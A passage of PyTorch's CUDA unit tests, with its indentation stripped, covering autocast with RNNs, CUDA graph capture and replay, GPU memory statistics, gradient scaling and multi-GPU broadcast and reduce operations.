input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.cuda.amp.autocast():
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Test is used to check, if autocast recaches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.cuda.amp.autocast():
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.cuda.amp.autocast():
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda._Graph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda._Graph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda._Graph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
g2 = torch.cuda._Graph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda._Graph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda._Graph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda._Graph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda._Graph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# warmup
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
opt.zero_grad(set_to_none=True)
# capture
g.capture_begin()
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
